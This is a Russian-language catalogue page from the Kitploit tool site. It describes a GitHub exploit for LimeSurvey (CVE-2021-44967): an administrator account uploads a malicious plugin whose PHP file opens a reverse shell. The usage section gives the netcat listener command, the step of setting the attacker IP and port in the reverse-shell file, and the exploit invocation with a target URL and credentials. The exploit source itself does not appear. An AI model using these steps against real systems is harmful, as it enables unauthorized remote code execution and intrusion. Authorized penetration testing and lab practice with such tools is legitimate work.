Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
-Limesurvey-RCE-CVE-2021-44967 — 🔥 Автоматизированный RCE эксплойт для Limesurvey (CVE-2021-44967). Оптимизированная цепочка эксплуатации для повышения привилегий. 🚀 | Kitploit
Инструменты/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 Автоматизированный RCE эксплойт для Limesurvey (CVE-2021-44967). Оптимизированная цепочка эксплуатации для повышения привилегий. 🚀

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚀 LimeSurvey RCE (CVE-2021-44967) - Авторизованное удаленное выполнение кода

Этот репозиторий содержит функциональный эксплойт для CVE-2021-44967 — уязвимости авторизованного удаленного выполнения кода в LimeSurvey.

🎯 Совместимость

Протестировано и подтверждена работа на:

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 Обзор уязвимости

Уязвимость позволяет аутентифицированному пользователю с правами администратора загрузить вредоносный плагин. Поскольку LimeSurvey строго не проверяет содержимое ZIP-архива плагина и не предотвращает выполнение PHP-файлов в каталоге плагинов, злоумышленник может добиться RCE, напрямую обратившись к загруженной оболочке.

✨ Возможности

  • 🤖 Автоматическая эксплуатация: Выполняет вход, обрабатывает CSRF-токены, загружает, устанавливает и активирует плагин автоматически.
  • ✅ Улучшенная совместимость: config.xml обновлён для совместимости с версиями LimeSurvey с 3.0 по 6.0.
  • 💣 Гибкие полезные нагрузки: Включает надёжный PHP-реверс-шелл.

🛠️ Использование

1️⃣ Подготовьте слушатель

Запустите слушатель netcat на вашей машине:

root@kitploit:~
nc -lvnp 443

2️⃣ Настройте реверс-шелл

Отредактируйте php-rev.php и укажите ваш локальный IP и порт:

root@kitploit:~
$ip = '<YOUR_IP>';
$port = 443;

3️⃣ Запустите эксплойт

root@kitploit:~
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

Пример:

root@kitploit:~
python3 exploit.py http://10.129.1.243/survey admin test

📁 Структура репозитория

  • 🐍 exploit.py: Основной скрипт автоматизации.
  • 🐘 php-rev.php: PHP-полезная нагрузка реверс-шелла.
  • ⚙️ config.xml: Обязательный файл конфигурации плагина LimeSurvey.

⚠️ Отказ от ответственности

Этот инструмент предназначен ТОЛЬКО для образовательных целей и авторизованного тестирования безопасности. Строго предназначен для использования в контролируемых, легальных средах (например, CTF, лабораторные среды или авторизованные мероприятия). Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте его ответственно и только на системах, на тестирование которых у вас есть явное разрешение.

Скачать инструмент